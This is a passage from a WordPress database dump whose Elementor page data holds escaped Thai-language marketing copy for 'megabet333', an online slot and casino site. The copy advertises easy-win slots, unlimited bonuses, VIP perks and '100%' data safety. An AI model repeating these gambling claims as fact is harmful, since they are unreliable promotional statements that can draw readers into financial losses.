\\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1160,145,'_thumbnail_id','60'),(1161,145,'_elementor_edit_mode','builder'),(1162,145,'_elementor_template_type','wp-page'),(1163,145,'_elementor_version','3.32.5'),(1164,145,'_elementor_pro_version','3.32.3'),(1165,145,'_wp_page_template','default'),(1166,145,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}');
INSERT INTO `IwGJ28BV_postmeta` VALUES (1167,145,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: 